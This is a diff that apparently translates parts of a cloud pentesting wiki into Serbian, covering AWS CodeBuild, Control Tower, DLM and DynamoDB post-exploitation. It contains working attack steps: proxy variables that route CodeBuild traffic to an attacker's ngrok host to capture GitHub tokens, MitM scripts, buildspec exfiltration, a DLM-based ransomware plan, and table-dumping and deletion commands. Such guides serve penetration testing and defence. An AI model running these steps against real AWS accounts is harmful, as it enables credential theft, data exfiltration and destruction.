+Za više informacija, proverite:
 
 {{#ref}}
 ../../aws-services/aws-codebuild-enum.md
 {{#endref}}
 
-### Check Secrets
+### Proverite Tajne
 
-If credentials have been set in Codebuild to connect to Github, Gitlab or Bitbucket in the form of personal tokens, passwords or OAuth token access, these **credentials are going to be stored as secrets in the secret manager**.\
-Therefore, if you have access to read the secret manager you will be able to get these secrets and pivot to the connected platform.
+Ako su kredencijali postavljeni u Codebuild za povezivanje sa Github, Gitlab ili Bitbucket u obliku ličnih tokena, lozinki ili OAuth token pristupa, ovi **kredencijali će biti sačuvani kao tajne u menadžeru tajni**.\
+Stoga, ako imate pristup za čitanje menadžera tajni, moći ćete da dobijete ove tajne i pređete na povezanu platformu.
 
 {{#ref}}
 ../../aws-privilege-escalation/aws-secrets-manager-privesc.md
 {{#endref}}
 
-### Abuse CodeBuild Repo Access
+### Zloupotreba Pristupa CodeBuild Repo-u
 
-In order to configure **CodeBuild**, it will need **access to the code repo** that it's going to be using. Several platforms could be hosting this code:
+Da bi se konfigurisao **CodeBuild**, biće mu potreban **pristup kod repozitorijumu** koji će koristiti. Nekoliko platformi može hostovati ovaj kod:
 
 

 
-The **CodeBuild project must have access** to the configured source provider, either via **IAM role** of with a github/bitbucket **token or OAuth access**.
+**CodeBuild projekat mora imati pristup** konfigurisanoj izvornoj platformi, bilo putem **IAM uloge** ili sa github/bitbucket **tokenom ili OAuth pristupom**.
 
-An attacker with **elevated permissions in over a CodeBuild** could abuse this configured access to leak the code of the configured repo and others where the set creds have access.\
-In order to do this, an attacker would just need to **change the repository URL to each repo the config credentials have access** (note that the aws web will list all of them for you):
+Napadač sa **povišenim dozvolama u CodeBuild-u** mogao bi zloupotrebiti ovaj konfigurisani pristup da otkrije kod konfigurisane repozitorije i druge gde postavljeni kredencijali imaju pristup.\
+Da bi to uradio, napadač bi samo trebao da **promeni URL repozitorijuma na svaki repozitorijum kojem konfigurisani kredencijali imaju pristup** (napomena: aws web će ih sve navesti za vas):
 
 

 
-And **change the Buildspec commands to exfiltrate each repo**.
+I **promeni Buildspec komande da eksfiltrira svaki repozitorijum**.
 
 > [!WARNING]
-> However, this **task is repetitive and tedious** and if a github token was configured with **write permissions**, an attacker **won't be able to (ab)use those permissions** as he doesn't have access to the token.\
-> Or does he? Check the next section
+> Međutim, ova **aktivnost je repetitivna i dosadna** i ako je github token konfiguran sa **dozvolama za pisanje**, napadač **neće moći da (zloupotrebi) te dozvole** jer nema pristup tokenu.\
+> Ili možda ima? Proverite sledeću sekciju
 
-### Leaking Access Tokens from AWS CodeBuild
-
-You can leak access given in CodeBuild to platforms like Github. Check if any access to external platforms was given with:
+### Otkivanje Pristupnih Tokena iz AWS CodeBuild
 
+Možete otkriti pristup dat u CodeBuild platformama poput Github-a. Proverite da li je bilo datog pristupa spoljnim platformama sa:
 ```bash
 aws codebuild list-source-credentials
 ```
-
 {{#ref}}
 aws-codebuild-token-leakage.md
 {{#endref}}
 
 ### `codebuild:DeleteProject`
 
-An attacker could delete an entire CodeBuild project, causing loss of project configuration and impacting applications relying on the project.
-
+Napadač bi mogao da obriše ceo CodeBuild projekat, uzrokujući gubitak konfiguracije projekta i utičući na aplikacije koje se oslanjaju na projekat.
 ```bash
 aws codebuild delete-project --name 
 ```
-
-**Potential Impact**: Loss of project configuration and service disruption for applications using the deleted project.
+**Potencijalni uticaj**: Gubitak konfiguracije projekta i prekid usluge za aplikacije koje koriste obrisani projekat.
 
 ### `codebuild:TagResource` , `codebuild:UntagResource`
 
-An attacker could add, modify, or remove tags from CodeBuild resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags.
-
+Napadač bi mogao da doda, izmeni ili ukloni oznake sa CodeBuild resursa, ometajući alokaciju troškova vaše organizacije, praćenje resursa i politike kontrole pristupa zasnovane na oznakama.
 ```bash
 aws codebuild tag-resource --resource-arn  --tags 
 aws codebuild untag-resource --resource-arn  --tag-keys 
 ```
-
-**Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies.
+**Potencijalni uticaj**: Poremećaj alokacije troškova, praćenja resursa i politika kontrole pristupa zasnovanih na oznakama.
 
 ### `codebuild:DeleteSourceCredentials`
 
-An attacker could delete source credentials for a Git repository, impacting the normal functioning of applications relying on the repository.
-
+Napadač bi mogao da obriše izvorne akreditive za Git repozitorijum, što bi uticalo na normalno funkcionisanje aplikacija koje se oslanjaju na repozitorijum.
 ```sql
 aws codebuild delete-source-credentials --arn 
 ```
-
-**Potential Impact**: Disruption of normal functioning for applications relying on the affected repository due to the removal of source credentials.
+**Potencijalni uticaj**: Poremećaj normalnog funkcionisanja aplikacija koje se oslanjaju na pogođeni repozitorijum zbog uklanjanja izvora kredencijala.
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md
index c514d7a7c..8bc0b994b 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md
@@ -2,73 +2,68 @@
 
 {{#include ../../../../banners/hacktricks-training.md}}
 
-## Recover Github/Bitbucket Configured Tokens
-
-First, check if there are any source credentials configured that you could leak:
+## Oporavak konfigurisanih tokena za Github/Bitbucket
 
+Prvo, proverite da li postoje bilo akreditivi izvora koji su konfigurirani koje biste mogli da iscurite:
 ```bash
 aws codebuild list-source-credentials
 ```
-
 ### Via Docker Image
 
-If you find that authentication to for example Github is set in the account, you can **exfiltrate** that **access** (**GH token or OAuth token**) by making Codebuild to **use an specific docker image** to run the build of the project.
+Ako otkrijete da je autentifikacija, na primer, za Github postavljena na nalogu, možete **izvršiti** tu **pristup** (**GH token ili OAuth token**) tako što ćete naterati Codebuild da **koristi specifičnu docker sliku** za pokretanje izgradnje projekta.
 
-For this purpose you could **create a new Codebuild project** or change the **environment** of an existing one to set the **Docker image**.
+U tu svrhu možete **napraviti novi Codebuild projekat** ili promeniti **okruženje** postojećeg da postavite **Docker sliku**.
 
-The Docker image you could use is [https://github.com/carlospolop/docker-mitm](https://github.com/carlospolop/docker-mitm). This is a very basic Docker image that will set the **env variables `https_proxy`**, **`http_proxy`** and **`SSL_CERT_FILE`**. This will allow you to intercept most of the traffic of the host indicated in **`https_proxy`** and **`http_proxy`** and trusting the SSL CERT indicated in **`SSL_CERT_FILE`**.
+Docker slika koju možete koristiti je [https://github.com/carlospolop/docker-mitm](https://github.com/carlospolop/docker-mitm). Ovo je vrlo osnovna Docker slika koja će postaviti **env promenljive `https_proxy`**, **`http_proxy`** i **`SSL_CERT_FILE`**. Ovo će vam omogućiti da presretnete većinu saobraćaja hosta navedenog u **`https_proxy`** i **`http_proxy`** i verujete SSL CERT-u navedenom u **`SSL_CERT_FILE`**.
 
-1. **Create & Upload your own Docker MitM image**
-   - Follow the instructions of the repo to set your proxy IP address and set your SSL cert and **build the docker image**.
-     - **DO NOT SET `http_proxy`** to not intercept requests to the metadata endpoint.
-   - You could use **`ngrok`** like `ngrok tcp 4444` lo set the proxy to your host
-   - Once you have the Docker image built, **upload it to a public repo** (Dockerhub, ECR...)
-2. **Set the environment**
-   - Create a **new Codebuild project** or **modify** the environment of an existing one.
-   - Set the project to use the **previously generated Docker image**
+1. **Kreirajte i otpremite svoju Docker MitM sliku**
+- Pratite uputstva iz repozitorijuma da postavite svoju proxy IP adresu i postavite svoj SSL certifikat i **izgradite docker sliku**.
+- **NE POSTAVLJAJTE `http_proxy`** da ne biste presreli zahteve ka metadata endpoint-u.
+- Možete koristiti **`ngrok`** kao `ngrok tcp 4444` da postavite proxy na vaš host.
+- Kada izgradite Docker sliku, **otpremite je na javni repo** (Dockerhub, ECR...)
+2. **Postavite okruženje**
+- Kreirajte **novi Codebuild projekat** ili **izmenite** okruženje postojećeg.
+- Postavite projekat da koristi **prethodno generisanu Docker sliku**.
 
 

 
-3. **Set the MitM proxy in your host**
-
-- As indicated in the **Github repo** you could use something like:
+3. **Postavite MitM proxy na vašem hostu**
 
+- Kao što je navedeno u **Github repozitorijumu**, možete koristiti nešto poput:
 ```bash
 mitmproxy --listen-port 4444  --allow-hosts "github.com"
 ```
-
 > [!TIP]
-> The **mitmproxy version used was 9.0.1**, it was reported that with version 10 this might not work.
+> Verzija **mitmproxy koja je korišćena je 9.0.1**, prijavljeno je da sa verzijom 10 ovo možda neće raditi.
 
-4. **Run the build & capture the credentials**
+4. **Pokrenite gradnju i zabeležite akreditive**
 
-- You can see the token in the **Authorization** header:
+- Možete videti token u **Authorization** header-u:
 
-  

-
-This could also be done from the aws cli with something like
+

 
+Ovo se takođe može uraditi iz aws cli sa nečim poput
 ```bash
 # Create project using a Github connection
 aws codebuild create-project --cli-input-json file:///tmp/buildspec.json
 
 ## With /tmp/buildspec.json
 {
-    "name": "my-demo-project",
-    "source": {
-        "type": "GITHUB",
-        "location": "https://github.com/uname/repo",
-        "buildspec": "buildspec.yml"
-    },
-    "artifacts": {
-        "type": "NO_ARTIFACTS"
-    },
-    "environment": {
-        "type": "LINUX_CONTAINER", // Use "ARM_CONTAINER" to run docker-mitm ARM
-        "image": "docker.io/carlospolop/docker-mitm:v12",
-        "computeType": "BUILD_GENERAL1_SMALL",
-        "imagePullCredentialsType": "CODEBUILD"
-    }
+"name": "my-demo-project",
+"source": {
+"type": "GITHUB",
+"location": "https://github.com/uname/repo",
+"buildspec": "buildspec.yml"
+},
+"artifacts": {
+"type": "NO_ARTIFACTS"
+},
+"environment": {
+"type": "LINUX_CONTAINER", // Use "ARM_CONTAINER" to run docker-mitm ARM
+"image": "docker.io/carlospolop/docker-mitm:v12",
+"computeType": "BUILD_GENERAL1_SMALL",
+"imagePullCredentialsType": "CODEBUILD"
+}
 }
 
 ## Json
@@ -76,117 +71,102 @@ aws codebuild create-project --cli-input-json file:///tmp/buildspec.json
 # Start the build
 aws codebuild start-build --project-name my-project2
 ```
-
 ### Via insecureSSL
 
-**Codebuild** projects have a setting called **`insecureSsl`** that is hidden in the web you can only change it from the API.\
-Enabling this, allows to Codebuild to connect to the repository **without checking the certificate** offered by the platform.
-
-- First you need to enumerate the current configuration with something like:
+**Codebuild** projekti imaju podešavanje pod nazivom **`insecureSsl`** koje je skriveno na vebu i može se promeniti samo putem API-ja.\
+Omogućavanje ovoga omogućava Codebuild-u da se poveže sa repozitorijumom **bez provere sertifikata** koji nudi platforma.
 
+- Prvo treba da enumerišete trenutnu konfiguraciju sa nečim poput:
 ```bash
 aws codebuild batch-get-projects --name 
 ```
-
-- Then, with the gathered info you can update the project setting **`insecureSsl`** to **`True`**. The following is an example of my updating a project, notice the **`insecureSsl=True`** at the end (this is the only thing you need to change from the gathered configuration).
-  - Moreover, add also the env variables **http_proxy** and **https_proxy** pointing to your tcp ngrok like:
-
+- Zatim, sa prikupljenim informacijama možete ažurirati postavku projekta **`insecureSsl`** na **`True`**. Sledeći je primer mog ažuriranja projekta, obratite pažnju na **`insecureSsl=True`** na kraju (ovo je jedina stvar koju treba da promenite iz prikupljene konfiguracije).
+- Pored toga, dodajte i env varijable **http_proxy** i **https_proxy** koje upućuju na vaš tcp ngrok kao:
 ```bash
 aws codebuild update-project --name  \
-    --source '{
-        "type": "GITHUB",
-        "location": "https://github.com/carlospolop/404checker",
-        "gitCloneDepth": 1,
-        "gitSubmodulesConfig": {
-            "fetchSubmodules": false
-        },
-        "buildspec": "version: 0.2\n\nphases:\n  build:\n    commands:\n       - echo \"sad\"\n",
-        "auth": {
-            "type": "CODECONNECTIONS",
-            "resource": "arn:aws:codeconnections:eu-west-1:947247140022:connection/46cf78ac-7f60-4d7d-bf86-5011cfd3f4be"
-        },
-        "reportBuildStatus": false,
-        "insecureSsl": true
-    }' \
-    --environment '{
-        "type": "LINUX_CONTAINER",
-        "image": "aws/codebuild/standard:5.0",
-        "computeType": "BUILD_GENERAL1_SMALL",
-        "environmentVariables": [
-            {
-                "name": "http_proxy",
-                "value": "http://2.tcp.eu.ngrok.io:15027"
-            },
-            {
-                "name": "https_proxy",
-                "value": "http://2.tcp.eu.ngrok.io:15027"
-            }
-        ]
-    }'
+--source '{
+"type": "GITHUB",
+"location": "https://github.com/carlospolop/404checker",
+"gitCloneDepth": 1,
+"gitSubmodulesConfig": {
+"fetchSubmodules": false
+},
+"buildspec": "version: 0.2\n\nphases:\n  build:\n    commands:\n       - echo \"sad\"\n",
+"auth": {
+"type": "CODECONNECTIONS",
+"resource": "arn:aws:codeconnections:eu-west-1:947247140022:connection/46cf78ac-7f60-4d7d-bf86-5011cfd3f4be"
+},
+"reportBuildStatus": false,
+"insecureSsl": true
+}' \
+--environment '{
+"type": "LINUX_CONTAINER",
+"image": "aws/codebuild/standard:5.0",
+"computeType": "BUILD_GENERAL1_SMALL",
+"environmentVariables": [
+{
+"name": "http_proxy",
+"value": "http://2.tcp.eu.ngrok.io:15027"
+},
+{
+"name": "https_proxy",
+"value": "http://2.tcp.eu.ngrok.io:15027"
+}
+]
+}'
 ```
-
-- Then, run the basic example from [https://github.com/synchronizing/mitm](https://github.com/synchronizing/mitm) in the port pointed by the proxy variables (http_proxy and https_proxy)
-
+- Zatim pokrenite osnovni primer sa [https://github.com/synchronizing/mitm](https://github.com/synchronizing/mitm) na portu koji su označili proxy varijable (http_proxy i https_proxy)
 ```python
 from mitm import MITM, protocol, middleware, crypto
 
 mitm = MITM(
-    host="127.0.0.1",
-    port=4444,
-    protocols=[protocol.HTTP],
-    middlewares=[middleware.Log], # middleware.HTTPLog used for the example below.
-    certificate_authority = crypto.CertificateAuthority()
+host="127.0.0.1",
+port=4444,
+protocols=[protocol.HTTP],
+middlewares=[middleware.Log], # middleware.HTTPLog used for the example below.
+certificate_authority = crypto.CertificateAuthority()
 )
 mitm.run()
 ```
-
-- Finally, click on **Build the project**, the **credentials** will be **sent in clear text** (base64) to the mitm port:
+- Na kraju, kliknite na **Build the project**, **akreditivi** će biti **poslati u čistom tekstu** (base64) na mitm port:
 
 

 
-### ~~Via HTTP protocol~~
+### ~~Putem HTTP protokola~~
 
-> [!TIP] > **This vulnerability was corrected by AWS at some point the week of the 20th of Feb of 2023 (I think on Friday). So an attacker can't abuse it anymore :)**
+> [!TIP] > **Ova ranjivost je ispravljena od strane AWS-a u nekom trenutku tokom nedelje 20. februara 2023. (mislim u petak). Tako da napadač više ne može da je zloupotrebi :)**
 
-An attacker with **elevated permissions in over a CodeBuild could leak the Github/Bitbucket token** configured or if permissions was configured via OAuth, the **temporary OAuth token used to access the code**.
+Napadač sa **povišenim dozvolama u CodeBuild-u mogao bi da iscuri Github/Bitbucket token** koji je konfigurisan ili ako su dozvole konfigurirane putem OAuth, **privremeni OAuth token koji se koristi za pristup kodu**.
 
-- An attacker could add the environment variables **http_proxy** and **https_proxy** to the CodeBuild project pointing to his machine (for example `http://5.tcp.eu.ngrok.io:14972`).
+- Napadač bi mogao da doda promenljive okruženja **http_proxy** i **https_proxy** u CodeBuild projekat koje upućuju na njegovu mašinu (na primer `http://5.tcp.eu.ngrok.io:14972`).
 
 

 
 

 
-- Then, change the URL of the github repo to use HTTP instead of HTTPS, for example: `http://github.com/carlospolop-forks/TestActions`
-- Then, run the basic example from [https://github.com/synchronizing/mitm](https://github.com/synchronizing/mitm) in the port pointed by the proxy variables (http_proxy and https_proxy)
-
+- Zatim, promenite URL github repozitorijuma da koristi HTTP umesto HTTPS, na primer: `http://github.com/carlospolop-forks/TestActions`
+- Zatim, pokrenite osnovni primer sa [https://github.com/synchronizing/mitm](https://github.com/synchronizing/mitm) na portu koji su označile proxy promenljive (http_proxy i https_proxy)
 ```python
 from mitm import MITM, protocol, middleware, crypto
 
 mitm = MITM(
-    host="0.0.0.0",
-    port=4444,
-    protocols=[protocol.HTTP],
-    middlewares=[middleware.Log], # middleware.HTTPLog used for the example below.
-    certificate_authority = crypto.CertificateAuthority()
+host="0.0.0.0",
+port=4444,
+protocols=[protocol.HTTP],
+middlewares=[middleware.Log], # middleware.HTTPLog used for the example below.
+certificate_authority = crypto.CertificateAuthority()
 )
 mitm.run()
 ```
-
-- Next, click on **Build the project** or start the build from command line:
-
+- Zatim kliknite na **Build the project** ili pokrenite build iz komandne linije:
 ```sh
 aws codebuild start-build --project-name 
 ```
-
-- Finally, the **credentials** will be **sent in clear text** (base64) to the mitm port:
+- Na kraju, **akreditivi** će biti **poslati u čistom tekstu** (base64) na mitm port:
 
 

 
 > [!WARNING]
-> Now an attacker will be able to use the token from his machine, list all the privileges it has and (ab)use easier than using the CodeBuild service directly.
+> Sada će napadač moći da koristi token sa svoje mašine, da izlista sve privilegije koje ima i (zlo)upotrebi lakše nego korišćenjem CodeBuild servisa direktno.
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md
index f1c6fb394..1cb69af3d 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md
@@ -8,17 +8,11 @@
 ../aws-services/aws-security-and-detection-services/aws-control-tower-enum.md
 {{#endref}}
 
-### Enable / Disable Controls
-
-To further exploit an account, you might need to disable/enable Control Tower controls:
+### Omogućite / Onemogućite Kontrole
 
+Da biste dodatno iskoristili nalog, možda ćete morati da onemogućite/omogućite kontrole Control Tower-a:
 ```bash
 aws controltower disable-control --control-identifier  --target-identifier 
 aws controltower enable-control --control-identifier  --target-identifier 
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md
index baa309e53..6666f4aa8 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md
@@ -2,98 +2,90 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Data Lifecycle Manger (DLM)
+## Menadžer životnog ciklusa podataka (DLM)
 
 ### `EC2:DescribeVolumes`, `DLM:CreateLifeCyclePolicy`
 
-A ransomware attack can be executed by encrypting as many EBS volumes as possible and then erasing the current EC2 instances, EBS volumes, and snapshots. To automate this malicious activity, one can employ Amazon DLM, encrypting the snapshots with a KMS key from another AWS account and transferring the encrypted snapshots to a different account. Alternatively, they might transfer snapshots without encryption to an account they manage and then encrypt them there. Although it's not straightforward to encrypt existing EBS volumes or snapshots directly, it's possible to do so by creating a new volume or snapshot.
+Napad ransomware-a može se izvršiti šifrovanjem što je moguće više EBS volumena, a zatim brisanjem trenutnih EC2 instanci, EBS volumena i snimaka. Da bi se automatizovala ova zla aktivnost, može se koristiti Amazon DLM, šifrujući snimke sa KMS ključem iz drugog AWS naloga i prebacujući šifrovane snimke na drugi nalog. Alternativno, mogu prebaciti snimke bez šifrovanja na nalog koji upravljaju, a zatim ih tamo šifrovati. Iako nije jednostavno direktno šifrovati postojeće EBS volumene ili snimke, to je moguće učiniti kreiranjem novog volumena ili snimka.
 
-Firstly, one will use a command to gather information on volumes, such as instance ID, volume ID, encryption status, attachment status, and volume type.
+Prvo, koristiće se komanda za prikupljanje informacija o volumenima, kao što su ID instance, ID volumena, status šifrovanja, status povezivanja i tip volumena.
 
 `aws ec2 describe-volumes`
 
-Secondly, one will create the lifecycle policy. This command employs the DLM API to set up a lifecycle policy that automatically takes daily snapshots of specified volumes at a designated time. It also applies specific tags to the snapshots and copies tags from the volumes to the snapshots. The policyDetails.json file includes the lifecycle policy's specifics, such as target tags, schedule, the ARN of the optional KMS key for encryption, and the target account for snapshot sharing, which will be recorded in the victim's CloudTrail logs.
-
+Drugo, kreiraće se politika životnog ciklusa. Ova komanda koristi DLM API za postavljanje politike životnog ciklusa koja automatski pravi dnevne snimke određenih volumena u određenom vremenu. Takođe primenjuje specifične oznake na snimke i kopira oznake sa volumena na snimke. Datoteka policyDetails.json uključuje detalje politike životnog ciklusa, kao što su ciljne oznake, raspored, ARN opcionalnog KMS ključa za šifrovanje i ciljni nalog za deljenje snimaka, koji će biti zabeleženi u CloudTrail logovima žrtve.
 ```bash
 aws dlm create-lifecycle-policy --description "My first policy" --state ENABLED --execution-role-arn arn:aws:iam::12345678910:role/AWSDataLifecycleManagerDefaultRole --policy-details file://policyDetails.json
 ```
-
-A template for the policy document can be seen here:
-
+Šablon za dokument politike može se videti ovde:
 ```bash
 {
-  "PolicyType": "EBS_SNAPSHOT_MANAGEMENT",
-  "ResourceTypes": [
-    "VOLUME"
-  ],
-  "TargetTags": [
-    {
-      "Key": "ExampleKey",
-      "Value": "ExampleValue"
-    }
-  ],
-  "Schedules": [
-    {
-      "Name": "DailySnapshots",
-      "CopyTags": true,
-      "TagsToAdd": [
-        {
-          "Key": "SnapshotCreator",
-          "Value": "DLM"
-        }
-      ],
-      "VariableTags": [
-        {
-          "Key": "CostCenter",
-          "Value": "Finance"
-        }
-      ],
-      "CreateRule": {
-        "Interval": 24,
-        "IntervalUnit": "HOURS",
-        "Times": [
-          "03:00"
-        ]
-      },
-      "RetainRule": {
-        "Count": 14
-      },
-      "FastRestoreRule": {
-        "Count": 2,
-        "Interval": 12,
-        "IntervalUnit": "HOURS"
-      },
-      "CrossRegionCopyRules": [
-        {
-          "TargetRegion": "us-west-2",
-          "Encrypted": true,
-          "CmkArn": "arn:aws:kms:us-west-2:123456789012:key/your-kms-key-id",
-          "CopyTags": true,
-          "RetainRule": {
-            "Interval": 1,
-            "IntervalUnit": "DAYS"
-          }
-        }
-      ],
-      "ShareRules": [
-        {
-          "TargetAccounts": [
-            "123456789012"
-          ],
-          "UnshareInterval": 30,
-          "UnshareIntervalUnit": "DAYS"
-        }
-      ]
-    }
-  ],
-  "Parameters": {
-    "ExcludeBootVolume": false
-  }
+"PolicyType": "EBS_SNAPSHOT_MANAGEMENT",
+"ResourceTypes": [
+"VOLUME"
+],
+"TargetTags": [
+{
+"Key": "ExampleKey",
+"Value": "ExampleValue"
+}
+],
+"Schedules": [
+{
+"Name": "DailySnapshots",
+"CopyTags": true,
+"TagsToAdd": [
+{
+"Key": "SnapshotCreator",
+"Value": "DLM"
+}
+],
+"VariableTags": [
+{
+"Key": "CostCenter",
+"Value": "Finance"
+}
+],
+"CreateRule": {
+"Interval": 24,
+"IntervalUnit": "HOURS",
+"Times": [
+"03:00"
+]
+},
+"RetainRule": {
+"Count": 14
+},
+"FastRestoreRule": {
+"Count": 2,
+"Interval": 12,
+"IntervalUnit": "HOURS"
+},
+"CrossRegionCopyRules": [
+{
+"TargetRegion": "us-west-2",
+"Encrypted": true,
+"CmkArn": "arn:aws:kms:us-west-2:123456789012:key/your-kms-key-id",
+"CopyTags": true,
+"RetainRule": {
+"Interval": 1,
+"IntervalUnit": "DAYS"
+}
+}
+],
+"ShareRules": [
+{
+"TargetAccounts": [
+"123456789012"
+],
+"UnshareInterval": 30,
+"UnshareIntervalUnit": "DAYS"
+}
+]
+}
+],
+"Parameters": {
+"ExcludeBootVolume": false
+}
 }
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md
index d63689d9e..e0a9916f3 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md
@@ -4,7 +4,7 @@
 
 ## DynamoDB
 
-For more information check:
+Za više informacija pogledajte:
 
 {{#ref}}
 ../aws-services/aws-dynamodb-enum.md
@@ -12,342 +12,292 @@ For more information check:
 
 ### `dynamodb:BatchGetItem`
 
-An attacker with this permissions will be able to **get items from tables by the primary key** (you cannot just ask for all the data of the table). This means that you need to know the primary keys (you can get this by getting the table metadata (`describe-table`).
+Napadač sa ovim dozvolama će moći da **dobije stavke iz tabela po primarnom ključu** (ne možete jednostavno tražiti sve podatke iz tabele). To znači da morate znati primarne ključeve (to možete dobiti dobijanjem metapodataka tabele (`describe-table`).
 
 {{#tabs }}
 {{#tab name="json file" }}
-
 ```bash
 aws dynamodb batch-get-item --request-items file:///tmp/a.json
 
 // With a.json
 {
-    "ProductCatalog" : { // This is the table name
-        "Keys": [
-            {
-            "Id" : { // Primary keys name
-                "N": "205" // Value to search for, you could put here entries from 1 to 1000 to dump all those
-            }
-            }
-        ]
-    }
+"ProductCatalog" : { // This is the table name
+"Keys": [
+{
+"Id" : { // Primary keys name
+"N": "205" // Value to search for, you could put here entries from 1 to 1000 to dump all those
+}
+}
+]
+}
 }
 ```
-
 {{#endtab }}
 
 {{#tab name="inline" }}
-
 ```bash
 aws dynamodb batch-get-item \
-    --request-items '{"TargetTable": {"Keys": [{"Id": {"S": "item1"}}, {"Id": {"S": "item2"}}]}}' \
-    --region 
+--request-items '{"TargetTable": {"Keys": [{"Id": {"S": "item1"}}, {"Id": {"S": "item2"}}]}}' \
+--region 
 ```
-
 {{#endtab }}
 {{#endtabs }}
 
-**Potential Impact:** Indirect privesc by locating sensitive information in the table
+**Potencijalni uticaj:** Indirektno privesc lociranjem osetljivih informacija u tabeli
 
 ### `dynamodb:GetItem`
 
-**Similar to the previous permissions** this one allows a potential attacker to read values from just 1 table given the primary key of the entry to retrieve:
-
+**Slično prethodnim dozvolama** ova dozvola omogućava potencijalnom napadaču da čita vrednosti iz samo 1 tabele, s obzirom na primarni ključ unosa koji treba preuzeti:
 ```json
 aws dynamodb get-item --table-name ProductCatalog --key  file:///tmp/a.json
 
 // With a.json
 {
 "Id" : {
-    "N": "205"
+"N": "205"
 }
 }
 ```
-
-With this permission it's also possible to use the **`transact-get-items`** method like:
-
+Sa ovom dozvolom je takođe moguće koristiti metodu **`transact-get-items`** kao:
 ```json
 aws dynamodb transact-get-items \
-    --transact-items file:///tmp/a.json
+--transact-items file:///tmp/a.json
 
 // With a.json
 [
-    {
-        "Get": {
-            "Key": {
-                "Id": {"N": "205"}
-            },
-            "TableName": "ProductCatalog"
-        }
-    }
+{
+"Get": {
+"Key": {
+"Id": {"N": "205"}
+},
+"TableName": "ProductCatalog"
+}
+}
 ]
 ```
-
-**Potential Impact:** Indirect privesc by locating sensitive information in the table
+**Potencijalni uticaj:** Indirektni privesc lociranjem osetljivih informacija u tabeli
 
 ### `dynamodb:Query`
 
-**Similar to the previous permissions** this one allows a potential attacker to read values from just 1 table given the primary key of the entry to retrieve. It allows to use a [subset of comparisons](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html), but the only comparison allowed with the primary key (that must appear) is "EQ", so you cannot use a comparison to get the whole DB in a request.
+**Slično prethodnim dozvolama** ova omogućava potencijalnom napadaču da čita vrednosti iz samo 1 tabele, s obzirom na primarni ključ unosa koji treba preuzeti. Omogućava korišćenje [podskupa poređenja](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html), ali jedino poređenje koje je dozvoljeno sa primarnim ključem (koje mora biti prisutno) je "EQ", tako da ne možete koristiti poređenje da dobijete celu DB u jednom zahtevu.
 
 {{#tabs }}
 {{#tab name="json file" }}
-
 ```bash
 aws dynamodb query --table-name ProductCatalog --key-conditions file:///tmp/a.json
 
- // With a.json
- {
+// With a.json
+{
 "Id" : {
-    "ComparisonOperator":"EQ",
-    "AttributeValueList": [ {"N": "205"} ]
-    }
+"ComparisonOperator":"EQ",
+"AttributeValueList": [ {"N": "205"} ]
+}
 }
 ```
-
 {{#endtab }}
 
 {{#tab name="inline" }}
-
 ```bash
 aws dynamodb query \
-    --table-name TargetTable \
-    --key-condition-expression "AttributeName = :value" \
-    --expression-attribute-values '{":value":{"S":"TargetValue"}}' \
-    --region 
+--table-name TargetTable \
+--key-condition-expression "AttributeName = :value" \
+--expression-attribute-values '{":value":{"S":"TargetValue"}}' \
+--region 
 ```
-
 {{#endtab }}
 {{#endtabs }}
 
-**Potential Impact:** Indirect privesc by locating sensitive information in the table
+**Potencijalni uticaj:** Indirektno privesc lociranjem osetljivih informacija u tabeli
 
 ### `dynamodb:Scan`
 
-You can use this permission to **dump the entire table easily**.
-
+Možete koristiti ovu dozvolu da **lako izbacite celu tabelu**.
 ```bash
 aws dynamodb scan --table-name  #Get data inside the table
 ```
-
-**Potential Impact:** Indirect privesc by locating sensitive information in the table
+**Potencijalni uticaj:** Indirektno privesc lociranjem osetljivih informacija u tabeli
 
 ### `dynamodb:PartiQLSelect`
 
-You can use this permission to **dump the entire table easily**.
-
+Možete koristiti ovu dozvolu da **lako izvučete celu tabelu**.
 ```bash
 aws dynamodb execute-statement \
-    --statement "SELECT * FROM ProductCatalog"
+--statement "SELECT * FROM ProductCatalog"
 ```
-
-This permission also allow to perform `batch-execute-statement` like:
-
+Ova dozvola takođe omogućava izvršavanje `batch-execute-statement` kao:
 ```bash
 aws dynamodb batch-execute-statement \
-    --statements '[{"Statement": "SELECT * FROM ProductCatalog WHERE Id = 204"}]'
+--statements '[{"Statement": "SELECT * FROM ProductCatalog WHERE Id = 204"}]'
 ```
+ali morate da navedete primarni ključ sa vrednošću, tako da nije toliko korisno.
 
-but you need to specify the primary key with a value, so it isn't that useful.
-
-**Potential Impact:** Indirect privesc by locating sensitive information in the table
